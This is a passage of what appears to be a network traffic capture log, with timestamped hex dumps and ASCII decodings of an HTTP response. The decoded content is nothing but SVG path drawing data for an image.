                                                                                                                                                                                                                                                  Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3477INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3493INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                  Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3509INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3525INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                  Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3541INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                  Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3557INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3573INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3589INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                  Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3605INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                  Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3621INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                  Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3637INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                  Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3653INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                  Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3669INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3685INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                  Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3701INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3717INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                  Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3733INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
